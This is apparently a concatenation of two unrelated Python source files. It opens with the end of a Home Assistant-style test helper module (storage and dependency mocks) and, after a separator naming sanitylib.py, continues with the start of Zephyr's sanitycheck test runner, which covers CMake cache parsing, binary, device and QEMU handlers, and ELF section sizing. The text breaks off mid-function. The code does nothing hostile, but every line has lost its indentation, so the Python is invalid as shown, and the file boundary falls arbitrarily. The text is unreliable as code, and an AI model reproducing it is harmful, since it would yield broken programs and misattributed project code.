def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Return attribute value."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# sanitycheck to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
logger.debug(f"No timeout, return code from qemu: {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
logger.debug(f"return code from qemu: {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
